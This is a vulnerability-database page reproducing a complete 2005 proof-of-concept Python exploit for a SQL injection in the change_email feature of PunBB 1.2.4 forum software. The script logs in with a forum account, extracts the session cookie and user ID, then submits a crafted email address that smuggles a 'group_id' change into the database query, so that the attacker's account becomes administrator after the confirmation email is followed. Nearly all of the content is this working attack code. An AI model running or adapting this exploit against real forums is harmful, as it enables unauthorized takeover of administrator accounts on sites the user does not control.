Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

PunBB 1.2.4 (change_email) SQL Injection Exploit

🗓️ 11 Apr 2005 00:00:00Reported by Stefan EsserType 
zdt
 zdt🔗 0day.today👁 46 Views

PunBB 1.2.4 change_email SQL Injection Exploit Python script allows an attacker to change email and execute SQL injection

Code
================================================
PunBB 1.2.4 (change_email) SQL Injection Exploit
================================================




#!/usr/bin/python
#######################################################################
#  _  _                _                     _       ___  _  _  ___
# | || | __ _  _ _  __| | ___  _ _   ___  __| | ___ | _ \| || || _ \
# | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___||  _/| __ ||  _/
# |_||_|\__,_||_|  \__,_|\___||_||_|\___|\__,_|     |_|  |_||_||_|
#
#######################################################################
#         Proof of concept code from the Hardened-PHP Project
#######################################################################
#
#                           -= PunBB 1.2.4 =-
#                   change_email SQL injection exploit
#
#  user-supplied data within the database is still user-supplied data
#
#######################################################################

import urllib
import getopt
import sys
import string

__argv__ = sys.argv

def banner():
   print "PunBB 1.2.4 - change_email SQL injection exploit"
   print "Copyright (C) 2005 Hardened-PHP Project\n"

def usage():
   banner()
   print "Usage:\n"
   print "   $ ./punbb_change_email.py [options]\n"
   print "        -h http_url   url of the punBB forum to exploit"
   print "                      f.e. http://www.forum.net/punBB/"
   print "        -u username   punBB forum useraccount"
   print "        -p password   punBB forum userpassword"
   print "        -e email      email address where the admin leve activation email is sent"
   print "        -d domain     catch all domain to catch \"some-SQL-Query\"@domain emails"
   print ""
   sys.exit(-1)

def main():
   try:
       opts, args = getopt.getopt(sys.argv[1:], "h:u:p:e:d:")
   except getopt.GetoptError:
       usage()

   if len(__argv__) < 10:
       usage()

   username = None
   password = None
   email = None
   domain = None
   host = None
   for o, arg in opts:
       if o == "-h":
           host = arg
       if o == "-u":
           username = arg
       if o == "-p":
           password = arg
       if o == "-e":
           email = arg
       if o == "-d":
           domain = arg

   # Printout banner
   banner()

   # Check if everything we need is there
   if host == None:
       print "[-] need a host to connect to"
       sys.exit(-1)
   if username == None:
       print "[-] username needed to continue"
       sys.exit(-1)
   if password == None:
       print "[-] password needed to continue"
       sys.exit(-1)
   if email == None:
       print "[-] email address needed to continue"
       sys.exit(-1)
   if domain == None:
       print "[-] catch all domain needed to continue"
       sys.exit(-1)

   # Retrive cookie
   params = {
       'req_username' : username,
       'req_password' : password,
       'form_sent' : 1
   }

   wclient = urllib.URLopener()

   print "[+] Connecting to retrieve cookie"

   req = wclient.open(host + "/login.php?action=in", urllib.urlencode(params))
   info = req.info()
   if 'set-cookie' not in info:
       print "[-] Unable to retrieve cookie... something is wrong"
       sys.exit(-3)
   cookie = info['set-cookie']
   cookie = cookie[:string.find(cookie, ';')]
   print "[+] Cookie found - extracting user_id"
   user_id = cookie[string.find(cookie, "%3A%22")+6:string.find(cookie, "%22%3B")]
   print "[+] User-ID: %d" % (int(user_id))
   wclient.addheader('Cookie', cookie);

   email = '"' + email[:string.find(email, '@')] + '"@' + email[string.find(email, '@')+1:] + ',"\','
   append = 'group_id=\'1'
   email = email + ( ((50-len(append))-len(email)) * ' ' ) + append + '"@' + domain

   params = {
       'req_new_email' : email,
       'form_sent' : 1
   }

   print "[+] Connecting to request change email"
   req = wclient.open(host + "profile.php?action=change_email&id=" + user_id, urllib.urlencode(params))

   print "[+] Done... Now wait for the email. Log into punBB, go to the link in the email and become admin"

if __name__ == "__main__":
   main()



#  0day.today [2018-04-03]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
11 Apr 2005 00:00Current
7.1High risk
Vulners AI Score7.1
punbbsql injectionexploitpython script
46